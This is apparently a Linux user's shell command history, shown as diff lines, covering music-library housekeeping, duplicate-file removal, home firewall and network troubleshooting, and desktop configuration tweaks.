The\ Ocean.mp3 +\rm Green\ Day\ -\ Holiday.mp3 +\rm Sister\ Hazel\ -\ All\ For\ You.mp3 +\rm Gorillaz\ -\ Feel\ Good\ Inc..mp3 +\rm Matchbox\ Twenty\ -\ Push.mp3 +\rm Staind\ -\ Believe.mp3 +\rm 3\ Doors\ Down\ -\ Here\ Without\ You\ \(Live\).mp3 +\rm Blink-182\ -\ I\ Miss\ You.mp3 +\rm Eve\ 6\ -\ Inside\ Out.mp3 +\rm Vertical\ Horizon\ -\ Everything\ You\ Want.mp3 +vim +celar +mv *.mp3 dir/Pink\ Floyd/Animals/ +find . -type f -name "*.txt" -print +less The\ Cardigans/Gran\ Turismo/Torrent\ downloaded\ from\ torrent-core.org.txt +nslookup torrent-core.org +nslookup torrent-core.org +sudo ifdown eth9 +sudo ifdown eth0 +sudo ifconfig eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +sudo iptables -L -nxv +sudo iptables -L -nv +sudo iptables -Z +sudo iptables -L -nv +sudo iptables -f -t TRAFFIC_OUT +sudo iptables -t TRAFFIC_OUT -f +sudo iptables -t TRAFFIC_OUT -F +sudo iptables -L -nv +man iptables +sudo iptables -F TRAFFIC_OUT +sudo iptables -F TRAFFIC_IN +sudo iptables -L -nv +ls git-repos/ +ls git-repos/google/ +rm -rf coursebuilder_resources_1_11_x/ +ls -ltr +vim .config/pianobar/config +ls -al +sudo sysctl -p +xrdb -load .Xresources +man man +infocmp -x +less .bashrc +tput init +man man +infocmp -x +less README +ls /lib/terminfo/ +ll /lib +ls /lib/terminfo/ +less pcansi +file xterm-xfree86 +infocmp --help +man infocmp +infocmp -C xterm-xfree86 +infocmp -C xterm-xfree86 -X +infocmp -C xterm-xfree86 -x +ls w +ls v +ls s +ls r +ls p +ls q +ls m +ls l +ls h +ls E +ls d +ls c +ls a +ls b +infocmp -C linux +infocmp -x +ls x +infocmp -C xterm-debian +infocmp -C xterm-colr +infocmp -C xterm-color +vim dupes.txt +vim +tput colors +sudo iptables -L -nv +vim .bashrc +tset reset +env|less +vim .bashrc +vim-addon-manager +vim-addos -h +vim-addons --help +which vim-addons +ll /usr/bin/ +file /usr/bin/vim-addon +file /usr/bin/vim-addons +less /usr/bin/vim-addons +gems list +gems +gem list +gem --help +gem update +sudo su - +sudo su 0 +sudo su - +sudo i[tables -L|less +sudo iptables -L|less +man iptables +sudo iptables -L -vn --line-numbers|less +iptables -I INPUT 2 -m --state RELATED,ESTABLISHED -j ACCEPT +iptables -I INPUT 2 -m state --state RELATED,ESTABLISHED -j ACCEPT +sudo iptables -I INPUT 2 -m state --state RELATED,ESTABLISHED -j ACCEPT +sudo su - +xrdb --help +xrdb -query --help +xrdb -que +xrdb --help +xrdb -remove .Xresources +xrdb -n .Xresources +pkill -1 conky +alias +inc +luv +pkill -1 pianobar +inc +ssh root@router +sudo su - +h|grep tc +sudo su - +alias +stp +pkill -1 pianobar +sudo iptables -L -nv +ip neig +sudo iptables -L -nv +sudo su - +h|grep drop +h|grep -i iptables +sudo iptables-save +sudo iptables -L -nv --rule-numbers +sudo iptables -L -nv --list-numbers +sudo iptables -L -nv --line-numbers +sudo iptables -D FORWARD 1 +sudo iptables -L -nv --line-number +h|grep -i iptables +sudo iptables -F TRAFFIC_OUT +sudo iptables -F TRAFFIC_IN +h|grep -i iptables +sudo iptables -L -nv --line-number +sudo iptables -Z +sudo iptables -L -nv --line-number +less rules +sudo less /var/log/syslog|grep shrink +sudo less /var/log/syslog.1|grep -i shrink +sudo zcat /var/log/syslog.2.gz|grep -i shrink +sudo zcat /var/log/syslog.3.gz|grep -i shrink +sudo zcat /var/log/syslog.3.gz|grep -i mtu +sudo zcat /var/log/syslog.4.gz|grep -i mtu +sudo zcat /var/log/syslog.5.gz|grep -i mtu +sudo dmesg|less +sudo su +sudo su - +sudo grep pmtu /var/log/kern.log +sudo grep pmtu /var/log/syslog +sudo grep pmtu /var/log/syslog.1 +sudo iptables -L -nv --line-number +sudo iptables -L -nv --line-number|less +sudo iptables -I FORWARD 5 -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu +sudo iptables -L -nv --line-number|less +strace pianobar +stty sane +pkill -1 pianobar +sudo systemctl restart wicd +wiload.sh +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +sudo ifdown eth0 +sudo ifup eth0 +pkill -1 pianobar +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +wiload.sh +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +sudo ifdown eth- +sudo ifdown eth0 +sudo ifup eth0 +inc +sudo iptables -L -nv --line-number|less +pkill -1 conky +inc +luv +sudo iptables -I ACCEPT 20 -p tcp -m state --state NEW -m tcp --dport 5335 -j ACCEPT +sudo iptables -I INPUT 30 -p tcp -m state --state NEW -m tcp --dport 5335 -j ACCEPT +sudo iptables -I INPUT 30 -p udp -m state --state NEW -m udp --dport 5335 -j ACCEPT +sudo iptables -L -nv --line-number|less +luv +sudo strace pianobar +skssduo +stty normal +stty snae +stty sane +sudo less /etc/iptables/rules.v4 +pkill -1 pianobr +pkill -1 pianobar +sudo pkill -1 pianobar +vim .config/pianobar/config +man pianobar +sudo systemctl restart smbd +sudo systemctl restart nmbd +ls Stuff/ +lls +l +ls Pandora/ +ls Sugar\,\ We\'re\ Goin\'\ Down\ Radio/ +mv ~/tmp/Pandora/Sugar\,\ We\'re\ Goin\'\ Down\ Radio/*. +mv ~/tmp/Pandora/Sugar\,\ We\'re\ Goin\'\ Down\ Radio/* . +ls ~/tmp/Pandora/Sugar\,\ We\'re\ Goin\'\ Down\ Radio/ +mv * .. +mv ~/tmp/Pandora/Hey\ Mama\ \(Feat.\ Nicki\ Minaj\,\ Bebe\ Rexha\ \&\ Afrojack\)\ Radio/* . +unset TMOUT +set|grep TMOUT +reptyr --help +ps aux|gper mocp +ps aux|grer mocp +ps aux|grep mocp +mocp +less hash.py +rm hash.py +l. +rm .X +rm ..Xresources.un~ +l. +locate ^\.\.* +locate ^?\.\.* +locate ^?\.* +locate ^\.* +locate ^.* +sudo updatedb +locate ^.* +locate "^.*" +locate .* +locate (\.\.?*) +locate "(\.\.?*)" +locate \.\.?* +sudo updatedb +locate \.\.?* +rm ..bash_aliases.un~ +rm ..bashrc.un~ +locate \.?* +locate \/\.?* +sudo updatedb +locate \/\.?* +locate \/\.*$ +locate \/(.*$) +locate \/\(.*$\) +locate .bjohnston +locate bjohnston +locate \/.*$ +locate |grep \/.*$ +locate bjohnston|grep \/.*$ +locate bjohnston|grep \/.?*$ +locate bjohnston|grep \/.?*$|less +locate bjohnston|grep \/(.?|*)$ +locate bjohnston|grep \/\(.?|*\)$ +locate bjohnston|grep "\/\(.?|*\)$" +man grep +vim .bashrc +man grep +vim .bashrc +jobs +mocp +man mocp +less .bashrc +l. +less .LESS_TERMCAP +q +. .LESS_TERMCAP +mocp +vim .moc/config +mocp +vim .moc/config +mocp +vim .moc/config +mocp +vim config +mocp +find -not -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=seperate +find -not -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate +find . -not -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate +find . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate +find . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate +find . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate +time find . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate +time find . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +alias +ls -l +mkdir test +mv Music test/ +mv Music.bak test/ +time find ./test ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +time find . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +l +find . -type l -print +time find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +time find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +mv test Music +time find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +time find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +time find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +rm Pandora/All-American\ Rejects\ -\ Gives\ You\ Hell.mp3 Pandora/Sugar\,\ We\'re\ Goin\'\ Down\ Radio/All-American\ Rejects\ -\ Gives\ You\ Hell.mp3 +time find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +time find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep \.bak +time find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep \.bak|awk '{ print $2 }' +time find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep \.bak|awk -F/ '{ print $4 }' +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep \.bak|awk -F/ '{ print $4 }' > ~/dupes.txt +less ~/dupes.txt +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep \.bak +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep \.bak|awk -F" ./" '{ print $1 }' +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep \.bak|awk -F" ./" '{ print $2 }' +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep \.bak|awk -F" ./" '{ print "rm "$2 }' +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep \.bak|awk -F" ./" '{ print "rm ./"$2 }'>~/bak.txt +less ~/bak.txt +ls Music.bak/ +ls Music.bak/Pandora/ +mv ~/bak.txt . +vim bak.txt +mv bak.txt bak.sh +vim bak.sh +chmod +x bak.sh +./bak.sh +rm ~ +rm *~ +l. +rm .bak.* +l. +rm bak.sh +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep mp3 +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep mp3|awk -F" ./" '{ print "./"$2 }' +rm ./Music/Pandora/Hey Mama (Feat. Nicki Minaj, Bebe Rexha & Afrojack) Radio/AWOLNATION - Sail.mp3 +rm "./Music/Pandora/Hey Mama (Feat. Nicki Minaj, Bebe Rexha & Afrojack) Radio/AWOLNATION - Sail.mp3" +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg|grep mp3|awk -F" ./" '{ print "./"$2 }' > file +vim file +chmod +x file +./file +rm .file.un~ +rm file +l. +rm file~ +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate|grep -v jpg +find -P . ! -empty -type f -printf "%s +" | sort -rn | uniq -d | xargs -I{} -n1 find -P -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate +mocp +mv Music blah +mv * .. +la +rmdir blah/ +ls -tr +rm moc-playlist.m3u +rm music.m3u +rm Music.m3u +l. +ls -al +ls -lt +mocp +pianobar +clear;pianobar +stty sane +tset reset +pianobar +mocp +s +du -sk * +du -sh * +ls The\ Cardigans\ -\ Gran\ Turismo\ \(1998\)\[CBR-320\]/ +ls The\ Cardigans\ -\ Gran\ Turismo\ \(1998\)\[CBR-320\]/Obal/ +l. The\ Cardigans\ -\ Gran\ Turismo\ \(1998\)\[CBR-320\]/ +l. +l. Staind\ -\ Discography/ +l. Sixpence\ None\ the\ Richer\ -\ Studio\ Discography\ \[1994\ -\ 2012\]\ \[ALAC\]\ \[Pirate\ Shovon\]/ +l. Sixpence\ None\ the\ Richer\ -\ Studio\ Discography\ \[1994\ -\ 2012\]\ \[ALAC\]\ \[Pirate\ Shovon\]/\[1997\]\ -\ Sixpence\ None\ the\ Richer/ +l. Sixpence\ None\ the\ Richer\ -\ Studio\ Discography\ \[1994\ -\ 2012\]\ \[ALAC\]\ \[Pirate\ Shovon\]/\[1995\]\ -\ This\ Beautiful\ Mess/ +l. Sixpence\ None\ the\ Richer\ -\ Studio\ Discography\ \[1994\ -\ 2012\]\ \[ALAC\]\ \[Pirate\ Shovon\]/\[1997\]\ -\ Sixpence\ None\ the\ Richer/ +cp Sixpence\ None\ the\ Richer\ -\ Studio\ Discography\ \[1994\ -\ 2012\]\ \[ALAC\]\ \[Pirate\ Shovon\]/\[1997\]\ -\ Sixpence\ None\ the\ Richer/04\ -\ Kiss\ Me.m4a ../Music/ +du -sh * +ls 3\ Doors\ Down\ -\ Away\ From\ The\ Sun\ \(Dolby\ Headphone\)/ +ll Elle\ King\ -\ Love\ Stuff\ \(2015\)\ 320\ kbps\ \[GloDLS\]/ +mocp +ls Pandora/ +ls -R +ls -R Sixpence\ None\ the\ Richer\ -\ Studio\ Discography\ \[1994\ -\ 2012\]\ \[ALAC\]\ \[Pirate\ Shovon\]/ +du -sh Sixpence\ None\ the\ Richer\ -\ Studio\ Discography\ \[1994\ -\ 2012\]\ \[ALAC\]\ \[Pirate\ Shovon\]/ +du -sh ../Music/Sixpence\ None\ the\ Richer\ -\ Studio\ Discography\ \[1994\ -\ 2012\]\ \[ALAC\]\ \[Pirate\ Shovon\]/ +h|grep cd +h|grep cp +mv Sixpence\ None\ the\ Richer\ -\ Studio\ Discography\ \[1994\ -\ 2012\]\ \[ALAC\]\ \[Pirate\ Shovon\]/ .. +mocp +ls Pandora/ +ls Sugar\,\ We\'re\ Goin\'\ Down\ Radio/ +mv Sugar\,\ We\'re\ Goin\'\ Down\ Radio/* /media/bjohnston/ +mv Sugar\,\ We\'re\ Goin\'\ Down\ Radio/* /media/bjohnston/Acer/Users/bjohnston/MusiC/ +mv * /media/bjohnston/Acer/Users/bjohnston/Music/ +rmdir Sugar\,\ We\'re\ Goin\'\ Down\ Radio/ +ls Pandora/ +ls Pandora/Sugar\,\ We\'re\ Goin\'\ Down\ Radio/ +l. +rmdir Sugar\,\ We\'re\ Goin\'\ Down\ Radio/ +mv Kathy\ Mattea\ -\ Where\'ve\ You\ Been.mp3 /media/bjohnston/Acer/Users/bjohnston/Music/Stuff/ +rmdir Kathy\ Mattea\ Radio/ +ls Pandora/ +ls .. +ls Folder/ +mv *.pdf ~/Documents/PDF/ +mv *.torrent ~/Downloads/tmp/Torrents/ +mv *.apk ~/Downloads/ +ll|less +ls|less +ls|xcol +ls|xcol *|less +ls|xcol * +ls|xcol *.mp3 +vim ~/.bashrc +sudo su - +sudo mv /etc/ethers . +sudo ip neigh route flush dev etho +sudo ip neigh flush dev etho +sudo ip neigh flush dev eth0 +sudo ip neigh flush dev wlan0 +ip neigh +sudo iptables -L -nv +sudo iptables -F +sudo iptables -L -nv +sudo ip neigh flush dev wlan0 +sudo ip neigh flush dev eth0 +ip neigh +route +sudo systemctl stop smbd +sudo systemctl stop nmbd +sudo systemctl stop apache2 +sudo su - +pkill -QUIT evolution +ps aux|less +sudo apt-get update +sudo apt-get upgrade +sudo apt-get --with-new-packages upgrade +man apt-get +sudo apt-get upgrade --with-new-packages +sudo apt-get --with-new-pkgs upgrade +grep -i plant +grep -i plant * +cat comcast.txt +sudo ifconfig +wiload.sh +sudo ifconfig +vim comcast.txt +wiload +wiload.sh +sudo iptables-restore < /etc/iptables/rules.v4 +iptables -L +sudo iptables -L +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo vim /etc/hosts +wiload.sh +sudo vim /etc/host +sudo vim /etc/hosts +sudo ifdown eth0 +sudo ifconfig eth0 dodwn +sudo ifconfig eth0 down +sudo ifup eth0 +ifconfig +sudo iptables -L +sudo systemctl start smbd +sudo systemctl start nmbd +cat .bash_history |grep tbd +cat .bash_history |grep wins +h|grep wins +tdbtool --help +sudo su - +sudo systemctl restart smbd +sudo systemctl restart nmbd +ki +sudo su - +wiload.sh +cat /etc/hosts +sudo /etc/hostqs +sudo /etc/hosts +sudo vim /etc/hosts +unset TMOUT +sudo ifdown eth0 +sudo ifup eth0 +sudo /etc/hosts +cat /etc/hosts +sudo iptables -L -nv +sduo su - +sudo su - +mocp +rm *~ +l. +rm .*~ +l. +sudo su - +find . -max-depth 1 -type d -exec du -sh {} \; +man find +find . -maxdepth 0 -type d -exec du -sh {} \; +find . -maxdepth 1 -type d -exec du -sh {} \; +find . -maxdepth 1 -type d -exec du -sk {} \;|xargs sort -n +find . -maxdepth 1 -type d -exec du -sk {} \;| sort -n +du -sh * +ls userdata/ +du -sh userdata/* +ls userdata/Thumbnails/ +ls temp/ +ls temp/temp/ +ls .. +ls system/ +ls media/ +ls addons/ +find . -maxdepth 1 -type d -exec du -sk {} \;| sort -n +ls * +du -sk * +ls samsung/ +ls app/ +ls Download/ +ls Keepass/ +ls Music/ +ls Pictures/ +ls Music/Pandora/ +ls Pictures/ +ls Pictures/Restored/ +ls Ringtones/ +ls SilenceExport/ +ll SilenceExport/ +ls app/ +la +ls mysql/ +ll mysql/ +lh +ls Android/ +ls Android/Sdk/ +du -sk Android/ +du -sh Android/ +du -sh android/ +ls Documents/ +mv *.pdf PDF/ +l. +rm *~ +rm .*~ +la +sudo chown -R 1000:1000 /home/bjohnston/ +l. +la +l. +unlink dir +mv smb.conf ../Documents/ +mv file.sh ../*.sh ../Documents/ +mv *.sh ../Documents/ +mv *.pdf ../Documents/PDF/ +mv *.ldif ../Downloads/ +mkdir ../Documents/ldif +mv *.ldif ../Documents/ldif/ +ls tmp/ +mv apple.schema ../Documents/ +less C1100ZConfig-2017-11-16 +mv mv C1100ZConfig-2017-11-16 ../Documents/ +ls tmp/ +ls Music/ +l. Music/ +ls OneDrive/ +ls Backups/ +ls PDF/ +mv PDF/* Documents/PDF/ +ls PDF/ +l. PDF/ +ls Pictures/ +mv Pictures/ARRIS_SURFboard_SBG6700-AC_User_Guide.pdf Documents/PDF/ +ll Pictures/ +chmod 0644 Pictures/*.jpg +ll Pictures/ +mv Kody.JPG Kody.jpg +chmod 0644 Kody.jpg +chmod 0644 nelson.png +lll +less view +mv view ../Documents/ +l. +ls ne +ls new +la new +la OGQ/ +la +la +unlink Documents +la +mv wiload.tar ../Downloads/ +mv * ../Documents/ +la +rmdir scripts +ls Templates/ +la Templates/ +ls tmp/ +ls tmp/das-project-svn-7-trunk/ +ls tmp/Folder/ +man tr +mv "image1 (1).PNG" "image1 (1).png" +h|grep find +mocp +wiload.sh +sudo vim /etc/hosts +sudo su - +sudo dmesg|less +unset TMOUT +sudo systemctl start apache2 +sudo dmesg +vim .bashrc +. .bashrc +vim .bashrc +. .bashrc +vim .bashrc +. .bashrc +vim .bashrc +. .bashrc +vim .bashrc +. .bashrc +vim .bashrc +. .bashrc +vim .bashrc +. .bashrc +ftp ftp.gnu.org +cldaf +modinfo ath9k +less bashref.texi.gz +sudo ifup eth0 +man bash +vim .bashrc +man -k Bash\ Reference\ Manual +sudo apt-get --with-new-packages upgrade +scp root@router:/etc/config/* . +mkdir etc +scp root@router:/etc/* . +sudo systemd-tmpiles --create --predfix /var/log/journal +sudo systemd-tmpfiles --create --predfix /var/log/journal +sudo systemd-tmpfiles --create --prefix /var/log/journal +sudo systemctl restart systemd-journal +sudo systemctl restart systemd-journald +sudo dmesg|less +moc +mocp +sudo iwconfig wlan0 +sudo journalctl -b +unset TMOUT +pkill -QUIT evolution +ps aux|less +sudo systemctl stop slapd +sudo systemctl stop apache2 +sudo systemctl stop snmpd +pkill -9 firefox +sudo iptables-restore < /etc/iptables/rules.v4 +sudo sysctl -p +sudo systemctl stop smbd +sudo systemctl stop nmbd +pkill -1 conky +ip neith +ip neigh +sudo ip neigh flush +sudo ip neigh dev eth0 flush +sudo ip neigh flush dev eth0 +sudo ip neigh flush dev wlan0 +ip neigh +sudo pkill -QUIT obex +sudo pkill -QUIT blue +ps aux|less +sudo pkill -HUP blueberry +sudo systemctl stop bluetooth +ps aux|less +sudo pkill -HUP blueberry +ps aux|less +ls /etc/init.d/ +sudo /etc/init.d/avahi-daemon stop +sudo /etc/init.d/openvpnstop +sudo /etc/init.d/openvpn stop +sudo /etc/init.d/slapd stop +sudo /etc/init.d/snmpd stop +man sshd +man ssh_config +scp router:/tmp/arp.txt . +scp root@router:/tmp/arp.txt . +less arp.txt +ls -ltr +sudo chown bjohnston:bjohnston * +ls -ltr +pianobar +dmesg +sudo dmesg +cler +ssh root@router +scp root@ . +ssh root@router +ssh root@ +less rules.owt +man htmldoc +htmldoc -tDDDDD +man htmldoc +cat firewall +vim firewall +ssh root@router +route +sudo su - +scp root@router:/tmp/arp.txt . +ssh router +vim config +ssh router +man ssh_config +vim config +man ssh_config +ssh router +man ssh_config +ssh +less .ssh/config +vim .ssh/config +ssh router +ssh root@router +stty sane +ssh root@ +route +mkdir iprules +vim rules.v4 +jobs +vim rules.v4 +ls .. +job +jobs +sl +vim +mkdir Kody +sudo systemctl start smbd +sudo systemctl start bmbd +sudo systemctl start nmbd +vim firewall +kpbs +jobs +vim firewall +sudo cp /etc/iptables/rules.v4 Documents/ +sudo cp /etc/iptables/rules.v4 Documents/fwrules +chown 1000L1000 Documents/* +chown 1000:1000 Documents/* +mv firewall.user Documents/fwrules +mv firewall Documents/fwrules +mv firewall Documents/fwrules.new +mv firewall.user Documents/fwrules +v firewall.user Documents/fwrules +mv firewall.user Documents/fwrules +ls Documents/fwrules +ls Documents/ +mv firewall.user Documents/iprules/ +mv clear +mv rules* iprules/ +cat router +cat hosts +mv fw* iprules/ +less file.sh +mv file.sh iprules/ +cat wireless.pcap.pcapng +stty sane +cat router +cat stu +cat stuff +cat wrtbwmon.sh +vim rules +less fwrules +less rules.owt +man date +info time +less README +less desklet.js +pkill 1 kodi +pkill -1 kodi +mkdir openwrt +\s +\ls +mocp +\ls -ld +\ls -ld . +\ls -ld /* +\ls -ld * +\ls -ld *\ +\ls -ld */ +\ls -ld * +\ls -ld */ +ls -ld */ +ls -lad */ +ls -la -d */ +\ls -lad */ +\ls -lad .*/ +vim .bash_aliases +unset TMOUT +ls -p +ls -p | grep -v / +lf +vim .bashrc +vim .bash_aliases +which ls +man ls +ls -o +ls -o * +ls -o \* +man ls +ls -Q +less T +less TZ +man TZ +grep * tz +grep -i * tz +sudo grep -i * tz +sudo grep -i tz * +man tzselect +ls -o \* +ls -p \* +. .bashrc +alias +lf +./activate +la +sh activate +less activate +ln -sn ../env/mine/bin/activate +source bin/activate +pip install simplejson +less activate +deactivate +activate +source activate +set|less +sudo pip install simplejson +deactivate +unset TMOUT +less network-manager +q +ls ../dnsmasq-shared.d/ +ls ../system-connections/ +ls ../dispatcher.d/ +ls ../conf.d/ +less ../conf.d/default-wifi-powersave-on.conf +:q +rm *~ +l. +rm .default-wifi-powersave-on.conf.un~ +l. +sudo rm default-wifi-powersave-on.conf~ +sudo rm .default-wifi-powersave-on.conf.un~ +la +less NetworkManager.conf +man Networkmanager.conf +ls /etc/resolvconf/ +ls /etc/resolvconf/update-libc.d/ +less /etc/resolvconf/update-libc.d/avahi-daemon +ls /usr/lib/avahi/avahi-daemon-check-dns.sh +less /usr/lib/avahi/avahi-daemon-check-dns.sh +ls /var/run/avahi-daemon/ +ls -a /run/ +ls -al /run/ +less /run/agetty.reload +sudo less /run/agetty.reload +sudo less /run/wpa_supplicant/ +ls /run/wpa_supplicant/ +sudo ls /run/wpa_supplicant/ +sudo cat /run/wpa_supplicant/wlan0 +sudo su - +man -k xdg +man user-dirs.conf +man xdg-user-dirsupdate +man xdg-user-dirs-update +man xdg-user-dir +man xdg-user-dirs-update +export |grep -i xdg +man xdg-user-dirs-update +less user-dirs. +less user-dirs.dirs +vim user-dirs.dirs +less user-dirs.locale +less mimeapps.list +less monitors.xml +less pavucontrol.ini +less QtProject.conf +less rygel.conf +rm user-dirs.dirs~ +rm .user-dirs.dirs.un~ +l. +ls cinnamon-session/ +ls cinnamon-session/saved-session/ +ls evolution/ +ls evolution/sources/ +ls menus/ +less menus/applications-merged/user-chrome-apps.menu +man -k xdg +man xdg-user-dirs-update +man user-dirs.conf +cp /etc/xdg/user-dirs.conf . +vim user-dirs.conf +vim ~/.bashrc +vim user-dirs.conf +man user-dirs.conf +man -k xdg +ls /etc/xdg/ +less /etc/xdg/user-dirs.defaults +man -k xdg +ls /etc/xdg/ +less /etc/xdg/user-dirs.conf +man -k xdg +man xdg-user-dirs-update +man -k xdg +man -k xdg-dirs.defaults +man xdg-dirs.defaults +man user-dirs.defaults +man xdg-user-dirs-update +xdg-user-dirs-updatevn --dummy-output ~/tmp +xdg-user-dirs-updatenv --dummy-output ~/tmp +xdg-user-dirs-update --dummy-output ~/tmp +ls ~/tmp/ +ls ~/tmp/ -a +;s +man xdg-user-dirs-update +xdg-user-dirs-update output +man xdg-user-dirs-update +xdg-user-dirs-update --dummy-output tmp +la +ls .. +ls ../tmp/ +man xdg-user-dir +. ../.bashrc +export|grep -i xdg +xdg-user-dirs-update --dummy-output tmp +ls .. +ls ../tmp/ +xdg-user-dirs-update --dummy-output tmp +man xdg-user-dirs-update +xdg-user-dirs-update --set TEMLATES= +ls ~/tmp +man xdg-user-dirs-update +man xdg-user-dir +xdg-user-dirs-update +ls -ltr +less user-dirs.dirs +ls -ltr +less user-dirs.conf +less user-dirs.dirs +man xdg-user-dirs-update +xdg-user-dirs-update --set TEMPLATES $HOME/Documents/Templates +xdg-user-dirs-update --set PICTURES $HOME/Documents/Pictures +man xdg-user-dirs-update +man -k xdg +man xdg-user-dir +xdg-user-dir TEMPLATES +xdg-user-dir PICTURES +man -k xdg +ls /etc/xdg +ls /etc/xdg/menus/ +less /etc/xdg/menus/cinnamon-applications.menu +less Trolltech.conf +ls autostart/ +ll autostart/ +chmod +x autostart/mintupload.desktop +chmod +x autostart/mpd.desktop +less autostart/mpd.desktop +ll autostart/ +less autostart/mintupload.desktop +ls cinnamon-session/ +ls dconf/ +less dconf/user +strings dconf/user +man dconf +man dconf-editor +sudo apt-cache search dconf-editor +sudo apt-get install gconf-tools +sudo apt-get install gconf-tools dconf-editor +sudo apt-get install dconf-tools dconf-editor +man dconf-editor +man 